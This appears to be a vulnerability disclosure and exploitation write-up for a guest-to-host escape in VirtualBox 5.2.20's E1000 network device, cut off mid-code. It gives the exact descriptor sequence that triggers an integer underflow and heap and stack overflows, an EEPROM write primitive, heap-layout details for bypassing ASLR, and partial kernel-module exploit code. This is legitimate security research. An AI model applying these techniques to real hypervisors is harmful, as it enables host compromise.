I like VirtualBox, and it has nothing to do with the reason I post information about the vulnerability. The reason is disagreement with the current realities in information security, more precisely, in the direction of security research and bug bounty.
The first two points completely exhausted me, so my move is full disclosure.
Vulnerable software: VirtualBox 5.2.20 and earlier.
Host OS: any, the bug is in a common code base.
Guest OS: any.
VM configuration: default (the only requirements are that the network card is the Intel PRO/1000 MT Desktop (82540EM) and that it operates in NAT mode).
Until a patched version of VirtualBox is released, switch the network card of your virtual machines to PCnet (either of the two) or to Paravirtualized Network. If that is not possible, switch the Intel adapter from NAT to any other mode. The first option is more reliable.
When a new virtual machine is created, its default network adapter is the Intel PRO/1000 MT Desktop (82540EM), configured in NAT mode. For brevity, we will call it E1000.
The E1000 virtual device code contains a vulnerability that allows an attacker with root/administrator rights in the guest OS to escape to the host OS and execute code in ring 3. From there the attacker can use already well-known techniques to escalate privileges to ring 0 through the VirtualBox /dev/vboxdrv driver.
To send network packets, the guest does the same thing as a regular computer: it configures the network adapter and hands it packets, which consist of data link frames and higher-level headers. Packets are not passed to the adapter as they are, but wrapped in Tx descriptors (Transmit Descriptors). These data structures, described in the network card specification (317453006EN.PDF, Revision 4.0), store meta-information such as the packet size or VLAN tag, control TCP/IP segmentation, and so on.
The 82540EM specification defines three types of Tx descriptors: legacy, context, and data. Legacy descriptors apparently mattered in the past. The other two are used together. For us, it only matters that context descriptors set the maximum packet size and enable or disable TCP/IP segmentation, while data descriptors hold the physical memory addresses of the packets and specify their size. The packet size in a data descriptor cannot be larger than the size given in the context descriptor. Context descriptors are usually passed to the network card before data descriptors.
To pass Tx descriptors to the network adapter, the guest writes them into the Tx ring (Transmit Descriptor Ring). This is a ring buffer located in physical memory at a predefined address. Once all the required descriptors are written into the ring, the guest updates the TDT (Transmit Descriptor Tail) register in the adapter's MMIO region, which signals to the host that there are new descriptors to process.
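The ring mechanics described above can be sketched in a few lines of C. This is a simplified model, not driver code: the type and function names (`tx_ring_t`, `tx_ring_push`, `tx_ring_pending`) and the ring size are made up for illustration, the descriptor is reduced to two opaque 64-bit words, and the tail is a plain variable instead of an MMIO register.

```c
#include <assert.h>
#include <stdint.h>

#define RING_ENTRIES 8u  /* hypothetical ring size, chosen for illustration */

/* Simplified 16-byte descriptor: two opaque 64-bit words. */
typedef struct { uint64_t lo, hi; } tx_desc_t;

typedef struct {
    tx_desc_t ring[RING_ENTRIES]; /* stands in for the ring in guest physical memory */
    uint32_t  tdh;                /* head: next descriptor the device will read */
    uint32_t  tdt;                /* tail: next free slot, written by the guest */
} tx_ring_t;

/* Queue one descriptor; returns 0 on success, -1 if the ring is full. */
int tx_ring_push(tx_ring_t *r, tx_desc_t d)
{
    uint32_t next = (r->tdt + 1u) % RING_ENTRIES;
    if (next == r->tdh)
        return -1;               /* one slot stays empty to tell full from empty */
    r->ring[r->tdt] = d;
    r->tdt = next;               /* on real hardware: an MMIO write to TDT */
    return 0;
}

/* Number of descriptors the device still has to process. */
uint32_t tx_ring_pending(const tx_ring_t *r)
{
    return (r->tdt + RING_ENTRIES - r->tdh) % RING_ENTRIES;
}
```

In this model the tail moves on every push; a guest that wants the device to see several descriptors at once writes them all first and updates the tail register a single time.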
We have the following array of Tx-descriptors:
[context_1, data_2, data_3, context_4, data_5]
Suppose that they contain the following information (the names of the fields are specifically made human-readable, but they correspond to the descriptor fields from the 82540EM specification):
    context_1.header_length = 0
    context_1.maximum_segment_size = 0x3010
    context_1.tcp_segmentation_enabled = true

    data_2.data_length = 0x10
    data_2.end_of_packet = false
    data_2.tcp_segmentation_enabled = true

    data_3.data_length = 0
    data_3.end_of_packet = true
    data_3.tcp_segmentation_enabled = true

    context_4.header_length = 0
    context_4.maximum_segment_size = 0xF
    context_4.tcp_segmentation_enabled = true

    data_5.data_length = 0x4188
    data_5.end_of_packet = true
    data_5.tcp_segmentation_enabled = true

We will soon see why the descriptors must look exactly like this to trigger the bug.
Imagine that the guest wrote the above descriptors into the Tx ring in exactly this order and updated the TDT register. The VirtualBox process on the host now executes the e1kXmitPending function, located in src/VBox/Devices/Network/DevE1000.cpp (most comments here and below are removed for readability):
    static int e1kXmitPending(PE1KSTATE pThis, bool fOnWorkerThread)
    {
        ...
        while (!pThis->fLocked && e1kTxDLazyLoad(pThis))
        {
            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

The e1kTxDLazyLoad function reads all 5 Tx descriptors from the Tx ring. Then e1kLocateTxPacket is called for the first time. This function walks over the descriptors and prepares the state for further work, but does not do most of the actual descriptor processing. In our case, the first call to e1kLocateTxPacket handles the context_1, data_2, and data_3 descriptors. The two remaining descriptors, context_4 and data_5, are handled on the next iteration of the while loop (we will look at the second iteration in the next section). This split of the descriptor array in two has important consequences, so let's see why it happens.
The e1kLocateTxPacket function looks like this:
    static bool e1kLocateTxPacket(PE1KSTATE pThis)
    {
        ...
        for (int i = pThis->iTxDCurrent; i < pThis->nTxDFetched; ++i)
        {
            E1KTXDESC *pDesc = &pThis->aTxDescriptors[i];
            switch (e1kGetDescType(pDesc))
            {
                case E1K_DTYP_CONTEXT:
                    e1kUpdateTxContext(pThis, pDesc);
                    continue;
                case E1K_DTYP_LEGACY:
                    ...
                    break;
                case E1K_DTYP_DATA:
                    if (!pDesc->data.u64BufAddr || !pDesc->data.cmd.u20DTALEN)
                        break;
                    ...
                    break;
                default:
                    AssertMsgFailed(("Impossible descriptor type!"));
            }

The first descriptor (context_1) is E1K_DTYP_CONTEXT, so e1kUpdateTxContext is called. This function updates the TCP segmentation context if segmentation was requested in the descriptor. That is the case for context_1 (see the previous section), so the TCP segmentation context is updated (what the "TCP segmentation context update" actually does is not important to us, so we use the term simply to refer to this piece of code).
The second descriptor (data_2) is E1K_DTYP_DATA; some actions are performed for it that do not matter to us.
The third descriptor (data_3) is also E1K_DTYP_DATA, but since data_3.data_length == 0 (pDesc->data.cmd.u20DTALEN in the code above), no action is taken.
At this point all three descriptors have gone through initial processing, and two descriptors remain unprocessed. Now the trick: after the switch statement, the code checks whether the end_of_packet flag is set in the descriptor. It is set for data_3 (data_3.end_of_packet == true), so the code performs some actions and returns from the function:
if (pDesc->legacy.cmd.fEOP) { ... return true; }
If the data_3.end_of_packet flag were not set, the remaining two descriptors would also go through initial processing in the same call, and that would prevent the vulnerability. Below you will see why returning from the function before all descriptors have been walked leads to a bug.
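The early return can be reproduced with a small model in C. It is a sketch under simplifying assumptions, not the VirtualBox code: descriptors are reduced to a type and an end-of-packet flag, and the names `desc_t` and `locate_packet_end` are invented for the example.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

typedef enum { DESC_CONTEXT, DESC_DATA } desc_type_t;

typedef struct {
    desc_type_t type;
    bool        end_of_packet;  /* ignored for context descriptors */
} desc_t;

/* Returns the index one past the descriptor that closes the packet starting
 * at `start`, or `start` itself when no complete packet is found. */
size_t locate_packet_end(const desc_t *d, size_t n, size_t start)
{
    for (size_t i = start; i < n; ++i) {
        if (d[i].type == DESC_CONTEXT)
            continue;                 /* context descriptors never end a packet */
        if (d[i].end_of_packet)
            return i + 1;             /* early exit: later descriptors stay untouched */
    }
    return start;
}
```

For the five descriptors of the walkthrough, the first call stops after index 2 (data_3) and only a second call reaches context_4 and data_5, which is exactly the split the text describes.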
So, on return from e1kLocateTxPacket, the following descriptors are ready to have network packets extracted from them and sent to the network: context_1, data_2, data_3. Next, the inner while loop of e1kXmitPending calls e1kXmitPacket. This function walks over the descriptors again (5 in our case) to do the final processing:

    static int e1kXmitPacket(PE1KSTATE pThis, bool fOnWorkerThread)
    {
        ...
        while (pThis->iTxDCurrent < pThis->nTxDFetched)
        {
            E1KTXDESC *pDesc = &pThis->aTxDescriptors[pThis->iTxDCurrent];
            ...
            rc = e1kXmitDesc(pThis, pDesc, e1kDescAddr(TDBAH, TDBAL, TDH), fOnWorkerThread);
            ...
            if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
                break;
        }
For each descriptor, the e1kXmitDesc function is called:
    static int e1kXmitDesc(PE1KSTATE pThis, E1KTXDESC *pDesc, RTGCPHYS addr, bool fOnWorkerThread)
    {
        ...
        switch (e1kGetDescType(pDesc))
        {
            case E1K_DTYP_CONTEXT:
                ...
                break;
            case E1K_DTYP_DATA:
            {
                ...
                if (pDesc->data.cmd.u20DTALEN == 0 || pDesc->data.u64BufAddr == 0)
                {
                    E1kLog2(("% Empty data descriptor, skipped.\n", pThis->szPrf));
                }
                else
                {
                    if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
                    {
                        ...
                    }
                    else if (!pDesc->data.cmd.fTSE)
                    {
                        ...
                    }
                    else
                    {
                        STAM_COUNTER_INC(&pThis->StatTxPathFallback);
                        rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
                    }
                }
                ...

The first descriptor passed to e1kXmitDesc is context_1. The function does nothing for context descriptors.
The second descriptor is data_2. Since we set tcp_segmentation_enabled == true for all data descriptors (pDesc->data.cmd.fTSE in the code above), e1kFallbackAddToFrame is called. This is the function where the integer underflow will later occur while processing data_5.

    static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread)
    {
        ...
        uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;

        /*
         * Carve out segments.
         */
        int rc = VINF_SUCCESS;
        do
        {
            /* Calculate how many bytes we have left in this TCP segment */
            uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
            if (cb > pDesc->data.cmd.u20DTALEN)
            {
                /* This descriptor fits completely into current segment */
                cb = pDesc->data.cmd.u20DTALEN;
                rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
            }
            else
            {
                ...
            }

            pDesc->data.u64BufAddr    += cb;
            pDesc->data.cmd.u20DTALEN -= cb;
        } while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));

        if (pDesc->data.cmd.fEOP)
        {
            ...
            pThis->u16TxPktLen = 0;
            ...
        }

        return VINF_SUCCESS;
    }

The most important variables for us here are u16MaxPktLen, pThis->u16TxPktLen, and pDesc->data.cmd.u20DTALEN.
The table below shows the values of these variables before and after e1kFallbackAddToFrame runs for the two data descriptors.
| Tx descriptor | Before/after | u16MaxPktLen | pThis->u16TxPktLen | pDesc->data.cmd.u20DTALEN |
|---|---|---|---|---|
| data_2 | Before | 0x3010 | 0 | 0x10 |
| data_2 | After | 0x3010 | 0x10 | 0 |
| data_3 | Before | 0x3010 | 0x10 | 0 |
| data_3 | After | 0x3010 | 0x10 | 0 |

For us, the only important thing is that once data_3 has been processed, pThis->u16TxPktLen is 0x10.
And now the most important point. Take another look at the end of the listing for the e1kXmitPacket function:
if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP) break;
Since data_3 is not of type E1K_DTYP_CONTEXT and data_3.end_of_packet == true, we break out of the loop even though context_4 and data_5 still have to be handled. Again, just as with the initial processing, we stop before all descriptors are done. Why is this important? To understand the vulnerability, you need to know that all context descriptors are processed before data descriptors. Context descriptors are processed during the TCP segmentation context update in e1kLocateTxPacket. Data descriptors are processed later, in e1kXmitPacket. The developers did this to forbid changing u16MaxPktLen, which is controlled by context descriptors, after some bytes of a packet have already been processed. If we could change the context at any time, we could easily trigger an integer underflow in e1kFallbackAddToFrame (the size of the data processed so far is stored in pThis->u16TxPktLen):
uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
But we can bypass this protection. Recall that back in e1kLocateTxPacket we forced the function to return early because data_3.end_of_packet == true. As a result, two descriptors (context_4 and data_5) are still awaiting both initial and final processing, even though some bytes have already been processed (pThis->u16TxPktLen is 0x10, not zero).
So we can change u16MaxPktLen arbitrarily through context_4.maximum_segment_size and trigger the integer underflow.
We have completely processed the first three descriptors and return to the beginning of the internal while loop of the e1kXmitPending function:
    while (e1kLocateTxPacket(pThis))
    {
        fIncomplete = false;
        rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
        if (RT_FAILURE(rc))
            goto out;
        rc = e1kXmitPacket(pThis, fOnWorkerThread);
        if (RT_FAILURE(rc))
            goto out;
    }

Here e1kLocateTxPacket is called to do the initial processing of context_4 and data_5. As mentioned earlier, we can set context_4.maximum_segment_size to any value, including one that is smaller than the amount of data already processed. Recall our input data:

    context_4.header_length = 0
    context_4.maximum_segment_size = 0xF
    context_4.tcp_segmentation_enabled = true

    data_5.data_length = 0x4188
    data_5.end_of_packet = true
    data_5.tcp_segmentation_enabled = true
After running e1kLocateTxPacket, we have a maximum network packet size of 0xF, while the size of the already processed data is 0x10.
Finally, during the processing of data_5, the function e1kFallbackAddToFrame is called, where we have the following variable values:
| Tx descriptor | Before/after | u16MaxPktLen | pThis->u16TxPktLen | pDesc->data.cmd.u20DTALEN |
|---|---|---|---|---|
| data_5 | Before | 0xF | 0x10 | 0x4188 |
| data_5 | After | - | - | - |

As a result, an integer underflow occurs:

    uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
    =>
    uint32_t cb = 0xF - 0x10 = 0xFFFFFFFF;

This makes the following check succeed, because 0xFFFFFFFF > 0x4188:
    if (cb > pDesc->data.cmd.u20DTALEN)
    {
        cb = pDesc->data.cmd.u20DTALEN;
        rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
    }
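The arithmetic is easy to check in isolation. The sketch below repeats the subtraction with the same integer widths as the excerpt; the function names are invented, and `bytes_left_guarded` is only a hypothetical illustration of a guard, not the actual VirtualBox fix.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Bytes left in the current segment, computed as in the excerpt:
 * both operands are 16-bit, the result is stored in an unsigned 32-bit value. */
uint32_t bytes_left(uint16_t max_pkt_len, uint16_t tx_pkt_len)
{
    uint32_t cb = max_pkt_len - tx_pkt_len;  /* wraps when tx_pkt_len > max_pkt_len */
    return cb;
}

/* The "descriptor fits completely into current segment" check. */
bool fits_completely(uint16_t max_pkt_len, uint16_t tx_pkt_len, uint32_t dtalen)
{
    return bytes_left(max_pkt_len, tx_pkt_len) > dtalen;
}

/* Hypothetical guard (an assumption for illustration): report no room
 * instead of wrapping around. */
uint32_t bytes_left_guarded(uint16_t max_pkt_len, uint16_t tx_pkt_len)
{
    return tx_pkt_len >= max_pkt_len ? 0u : (uint32_t)(max_pkt_len - tx_pkt_len);
}
```

With the values from the table, `bytes_left(0xF, 0x10)` yields 0xFFFFFFFF, so a descriptor of 0x4188 bytes is treated as fitting into a segment that nominally has no room left at all.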
Now e1kFallbackAddSegment is called with a size (cb) of 0x4188. Without the vulnerability it is impossible to call this function with a size greater than 0x4000, because the TCP segmentation context update checks that the maximum segment size is less than or equal to 0x4000:

    DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc)
    {
        ...
        uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
        if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
        {
            pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
            ...
        }
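A stand-alone model of this clamp shows what it does and does not protect against. This is a sketch: `clamp_mss` is an invented name, and the limit 0x3FA0 is an assumption taken from the size the article gives for the buffer declared with E1K_MAX_TX_PKT_SIZE.

```c
#include <assert.h>
#include <stdint.h>

#define MAX_TX_PKT_SIZE 0x3FA0u  /* assumed: buffer size quoted in the article */
#define VTAG_LEN        4u

/* Returns the MSS that remains in effect after the clamp. */
uint16_t clamp_mss(uint16_t mss, uint8_t hdrlen)
{
    uint32_t max_segment = (uint32_t)mss + hdrlen + VTAG_LEN;
    if (max_segment > MAX_TX_PKT_SIZE)
        mss = (uint16_t)(MAX_TX_PKT_SIZE - hdrlen - VTAG_LEN);
    return mss;
}
```

The clamp only enforces an upper bound. A tiny value such as 0xF passes unchanged, and nothing compares it with the number of bytes already accumulated in the frame, which is the gap the descriptor sequence above relies on.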
How can we exploit the ability to call e1kFallbackAddSegment with an out-of-range size? I found at least two ways. First, the data sent by the guest is copied into a buffer on the heap:

    static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread)
    {
        ...
        PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
                          pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);

Here pThis->aTxPacketFallback is a buffer of size 0x3FA0 and u16Len is 0x4188: an obvious heap overflow, which can lead, say, to overwriting pointers to functions, objects, or anything else.
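How far the copy runs past the buffer follows directly from the numbers in the walkthrough. The helper below is a generic sketch (the name `bytes_past_end` is made up); the inputs are the buffer size 0x3FA0, the write offset 0x10 (the value of u16TxPktLen at that point), and the length 0x4188.

```c
#include <assert.h>
#include <stdint.h>

/* Bytes written past the end of a buffer of `capacity` bytes when `len` bytes
 * are copied to offset `offset`; 0 when the copy fits. */
uint32_t bytes_past_end(uint32_t capacity, uint32_t offset, uint32_t len)
{
    uint32_t end = offset + len;
    return end > capacity ? end - capacity : 0u;
}
```

For these values the copy ends at offset 0x4198, so `bytes_past_end(0x3FA0, 0x10, 0x4188)` gives 0x1F8 bytes written beyond aTxPacketFallback.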
Second, if we look deeper, we find that e1kFallbackAddSegment calls e1kTransmitFrame, which, with a certain configuration of the network adapter registers, calls e1kHandleRxPacket. This function allocates a buffer of size 0x4000 on the stack and copies data of the given size into it without any checks, since the checks are assumed to have been done earlier:

    static int e1kHandleRxPacket(PE1KSTATE pThis, const void *pvBuf, size_t cb, E1KRXDST status)
    {
    #if defined(IN_RING3)
        uint8_t rxPacket[E1K_MAX_RX_PKT_SIZE];
        ...
        if (status.fVP)
        {
            ...
        }
        else
            memcpy(rxPacket, pvBuf, cb);

As you can see, we have turned the integer underflow into a classic stack buffer overflow. Both primitives above, the heap buffer overflow and the stack buffer overflow, are used in the exploit.
The exploit is a Linux kernel module that is loaded into the guest OS. For Windows you would need a driver that differs only in the wrapper for initialization and in the kernel API calls.
Loading a driver on either operating system requires elevated privileges. This is normal and is not considered an insurmountable obstacle. Look at the Pwn2Own competition, for example, where researchers use exploit chains: a browser in the guest OS opens a malicious site, the exploit escapes the browser sandbox to gain full ring 3 access, then exploits an operating system vulnerability to reach ring 0, from where every attack on the hypervisor from the guest OS becomes possible.
Of course, the most powerful hypervisor vulnerabilities are those that can be exploited from guest ring 3. VirtualBox also has code that is reachable without root privileges, and it has been studied little so far.
The exploit is 100% stable. This means that it either always works or never works, the latter because of mismatched binaries or some more subtle reason I did not account for. It works on Ubuntu 16.04 and 18.04 x86_64 guests with the default configuration.
The driver maps the physical memory region that corresponds to the network card's MMIO into virtual memory. The physical address and size are set by the hypervisor.
    void* map_mmio(void) {
        off_t pa = 0xF0000000;
        size_t len = 0x20000;

        void* va = ioremap(pa, len);
        if (!va) {
            printk(KERN_INFO PFX"ioremap failed to map MMIO\n");
            return NULL;
        }

        return va;
    }

Then the E1000 general-purpose registers are configured, memory for the Tx ring is allocated, and the transmit registers are configured.

    void e1000_init(void* mmio) {
        // Configure general purpose registers
        configure_CTRL(mmio);

        // Configure TX registers
        g_tx_ring = kmalloc(MAX_TX_RING_SIZE, GFP_KERNEL);
        if (!g_tx_ring) {
            printk(KERN_INFO PFX"Failed to allocate TX Ring\n");
            return;
        }

        configure_TDBAL(mmio);
        configure_TDBAH(mmio);
        configure_TDLEN(mmio);
        configure_TCTL(mmio);
    }
From the very beginning of exploit development I decided not to use primitives found in VirtualBox subsystems that are disabled by default. First of all, this applies to the Chromium service (not the browser), which is responsible for 3D acceleration and in which researchers have found more than 40 vulnerabilities over the past year. An information leak discloses data, usually a pointer into some dynamic library, from which one can derive the library's base address and bypass ASLR.
This posed a problem: an information leak had to be found in components that run by default. The obvious thought was that since the main vulnerability lets us overflow the heap, that is, it belongs to the heap buffer overflow class, we control everything that lies past this buffer. As we will see, no additional vulnerabilities were needed: the integer underflow turned out to be powerful enough to provide read and write primitives, an information leak, and a stack buffer overflow.
Let's see what exactly is overflowing on the heap.
    /**
     * Device state structure.
     */
    struct E1kState_st
    {
        ...
        uint8_t     aTxPacketFallback[E1K_MAX_TX_PKT_SIZE];
        ...
        E1kEEPROM   eeprom;
        ...
    }

Here aTxPacketFallback is the buffer of size 0x3FA0 that is filled with data read from the data descriptor. While looking for interesting fields behind this buffer that could be changed, I came across the E1kEEPROM structure. Inside it there is another structure with the following fields (file src/VBox/Devices/Network/DevE1000.cpp):

    /**
     * 93C46-compatible EEPROM device emulation.
     */
    struct EEPROM93C46
    {
        ...
        bool m_fWriteEnabled;
        uint8_t Alignment1;
        uint16_t m_u16Word;
        uint16_t m_u16Mask;
        uint16_t m_u16Addr;
        uint32_t m_u32InternalWires;
        ...
    }

What do we gain by modifying them? The E1000 code implements access to the EEPROM, the non-volatile memory of the network adapter. The guest OS can access it through certain E1000 MMIO registers. EEPROM access is implemented as a finite state machine that has several states and performs four actions. We are interested only in the "write to memory" action. Here is what it looks like (file src/VBox/Devices/Network/DevEEPROM.cpp):

    EEPROM93C46::State EEPROM93C46::opWrite()
    {
        storeWord(m_u16Addr, m_u16Word);
        return WAITING_CS_FALL;
    }

    void EEPROM93C46::storeWord(uint32_t u32Addr, uint16_t u16Value)
    {
        if (m_fWriteEnabled) {
            E1kLog(("EEPROM: Stored word %04x at %08x\n", u16Value, u32Addr));
            m_au16Data[u32Addr] = u16Value;
        }
        m_u16Mask = DATA_MSB;
    }
Here m_u16Addr, m_u16Word, and m_fWriteEnabled are fields of the EEPROM93C46 structure, which we fully control. Therefore we can set them so that the statement

    m_au16Data[u32Addr] = u16Value;

writes two bytes at an arbitrary 16-bit index relative to the m_au16Data array, which is located in the same structure. We have found a write primitive.
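The reach of this primitive can be modelled without touching real memory. The sketch below is an illustration under assumptions: a flat byte array stands in for the heap, and `eeprom_model_t`, `model_store_word`, and the arena size are invented names and values. It mirrors the unchecked store from the excerpt and reports which byte offset was written.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define ARENA_SIZE 0x30000u   /* flat byte array standing in for the heap */

typedef struct {
    uint8_t  arena[ARENA_SIZE];
    uint32_t data_off;        /* where the model's m_au16Data starts in the arena */
    bool     write_enabled;   /* models m_fWriteEnabled */
    uint16_t addr;            /* models m_u16Addr */
    uint16_t word;            /* models m_u16Word */
} eeprom_model_t;

/* Models storeWord(): no bounds check on addr, as in the excerpt.
 * Returns the arena offset written, or UINT32_MAX if nothing was written. */
uint32_t model_store_word(eeprom_model_t *m)
{
    if (!m->write_enabled)
        return UINT32_MAX;
    uint32_t off = m->data_off + 2u * m->addr;   /* element index -> byte offset */
    assert(off + 2u <= ARENA_SIZE);              /* keeps the model itself in bounds */
    memcpy(&m->arena[off], &m->word, sizeof m->word);
    return off;
}
```

Because the index is 16 bits wide and each element is two bytes, the store can land up to 0x1FFFE bytes past the start of the array, always in the forward direction.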
The next task was to find data structures on the heap that are worth overwriting, keeping in mind that the main goal is to leak a pointer into some module in order to get its base address. Fortunately, there was no need for unreliable heap spraying: it turned out that the main data structures of the virtual devices are allocated from the internal hypervisor heap in such a way that the distance between these heap blocks is the same on every VirtualBox start, even though the virtual addresses of the blocks naturally differ from run to run because of ASLR.
Specifically, when VirtualBox starts, the PDM (Pluggable Device and Driver Manager) subsystem creates a PDMDEVINS object for each device, allocated from the hypervisor heap.

    int pdmR3DevInit(PVM pVM)
    {
        ...
        PPDMDEVINS pDevIns;
        if (paDevs[i].pDev->pReg->fFlags & (PDM_DEVREG_FLAGS_RC | PDM_DEVREG_FLAGS_R0))
            rc = MMR3HyperAllocOnceNoRel(pVM, cb, 0, MM_TAG_PDM_DEVICE, (void **)&pDevIns);
        else
            rc = MMR3HeapAllocZEx(pVM, MM_TAG_PDM_DEVICE, cb, (void **)&pDevIns);
        ...

I traced this piece of code under GDB with a script and got output like this:
    [trace-device-constructors] Constructing a device #0x0:
    [trace-device-constructors] Name: "pcarch", '\000' <repeats 25 times>
    [trace-device-constructors] Description: 0x7fc44d6f125a "PC Architecture Device"
    [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d57517b <pcarchConstruct(PPDMDEVINS, int, PCFGMNODE)>
    [trace-device-constructors] Instance: 0x7fc45486c1b0
    [trace-device-constructors] Data size: 0x8
    [trace-device-constructors] Constructing a device #0x1:
    [trace-device-constructors] Name: "pcbios", '\000' <repeats 25 times>
    [trace-device-constructors] Description: 0x7fc44d6ef37b "PC BIOS Device"
    [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d56bd3b <pcbiosConstruct(PPDMDEVINS, int, PCFGMNODE)>
    [trace-device-constructors] Instance: 0x7fc45486c720
    [trace-device-constructors] Data size: 0x11e8
    ...
    [trace-device-constructors] Constructing a device #0xe:
    [trace-device-constructors] Name: "e1000", '\000' <repeats 26 times>
    [trace-device-constructors] Description: 0x7fc44d70c6d0 "Intel PRO/1000 MT Desktop Ethernet.\n"
    [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d622969 <e1kR3Construct(PPDMDEVINS, int, PCFGMNODE)>
    [trace-device-constructors] Instance: 0x7fc470083400
    [trace-device-constructors] Data size: 0x53a0
    [trace-device-constructors] Constructing a device #0xf:
    [trace-device-constructors] Name: "ichac97", '\000' <repeats 24 times>
    [trace-device-constructors] Description: 0x7fc44d716ac0 "ICH AC'97 Audio Controller"
    [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d66a90f <ichac97R3Construct(PPDMDEVINS, int, PCFGMNODE)>
    [trace-device-constructors] Instance: 0x7fc470088b00
    [trace-device-constructors] Data size: 0x1848
    [trace-device-constructors] Constructing a device #0x10:
    [trace-device-constructors] Name: "usb-ohci", '\000' <repeats 23 times>
    [trace-device-constructors] Description: 0x7fc44d707025 "OHCI USB controller.\n"
    [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d5ea841 <ohciR3Construct(PPDMDEVINS, int, PCFGMNODE)>
    [trace-device-constructors] Instance: 0x7fc47008a4e0
    [trace-device-constructors] Data size: 0x1728
    [trace-device-constructors] Constructing a device #0x11:
    [trace-device-constructors] Name: "acpi", '\000' <repeats 27 times>
    [trace-device-constructors] Description: 0x7fc44d6eced8 "Advanced Configuration and Power Interface"
    [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d563431 <acpiR3Construct(PPDMDEVINS, int, PCFGMNODE)>
    [trace-device-constructors] Instance: 0x7fc47008be70
    [trace-device-constructors] Data size: 0x1570
    [trace-device-constructors] Constructing a device #0x12:
    [trace-device-constructors] Name: "GIMDev", '\000' <repeats 25 times>
    [trace-device-constructors] Description: 0x7fc44d6f17fa "VirtualBox GIM Device"
    [trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d575cde <gimdevR3Construct(PPDMDEVINS, int, PCFGMNODE)>
    [trace-device-constructors] Instance: 0x7fc47008dba0
    [trace-device-constructors] Data size: 0x90
    [trace-device-constructors] Instances:
    [trace-device-constructors] #0x0 Address: 0x7fc45486c1b0
    [trace-device-constructors] #0x1 Address 0x7fc45486c720 differs from previous by 0x570
    [trace-device-constructors] #0x2 Address 0x7fc4700685f0 differs from previous by 0x1b7fbed0
    [trace-device-constructors] #0x3 Address 0x7fc4700696d0 differs from previous by 0x10e0
    [trace-device-constructors] #0x4 Address 0x7fc47006a0d0 differs from previous by 0xa00
    [trace-device-constructors] #0x5 Address 0x7fc47006a450 differs from previous by 0x380
    [trace-device-constructors] #0x6 Address 0x7fc47006a920 differs from previous by 0x4d0
    [trace-device-constructors] #0x7 Address 0x7fc47006ad50 differs from previous by 0x430
    [trace-device-constructors] #0x8 Address 0x7fc47006b240 differs from previous by 0x4f0
    [trace-device-constructors] #0x9 Address 0x7fc4548ec9a0 differs from previous by 0x-1b77e8a0
    [trace-device-constructors] #0xa Address 0x7fc470075f90 differs from previous by 0x1b7895f0
    [trace-device-constructors] #0xb Address 0x7fc488022000 differs from previous by 0x17fac070
    [trace-device-constructors] #0xc Address 0x7fc47007cf80 differs from previous by 0x-17fa5080
    [trace-device-constructors] #0xd Address 0x7fc4700820f0 differs from previous by 0x5170
    [trace-device-constructors] #0xe Address 0x7fc470083400 differs from previous by 0x1310
    [trace-device-constructors] #0xf Address 0x7fc470088b00 differs from previous by 0x5700
    [trace-device-constructors] #0x10 Address 0x7fc47008a4e0 differs from previous by 0x19e0
    [trace-device-constructors] #0x11 Address 0x7fc47008be70 differs from previous by 0x1990
    [trace-device-constructors] #0x12 Address 0x7fc47008dba0 differs from previous by 0x1d30
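Look at device #0xE, the E1000. The second list shows that the next device is located 0x5700 bytes after the E1000, the one after that another 0x19E0 bytes further, and so on. As already mentioned, these distances are the same on every run, and this is what makes exploitation possible.
The devices that follow the E1000 are ICH AC'97, OHCI, ACPI, and VirtualBox GIM. By studying their data structures, I worked out how to use the write primitive.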
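The distances can be recomputed from the instance addresses in the GDB trace. The constants below are copied from that trace and change on every run; only their differences are expected to stay the same. The macro and function names are chosen for this sketch.

```c
#include <assert.h>
#include <stdint.h>

/* Instance addresses copied from the GDB trace; they differ on every run. */
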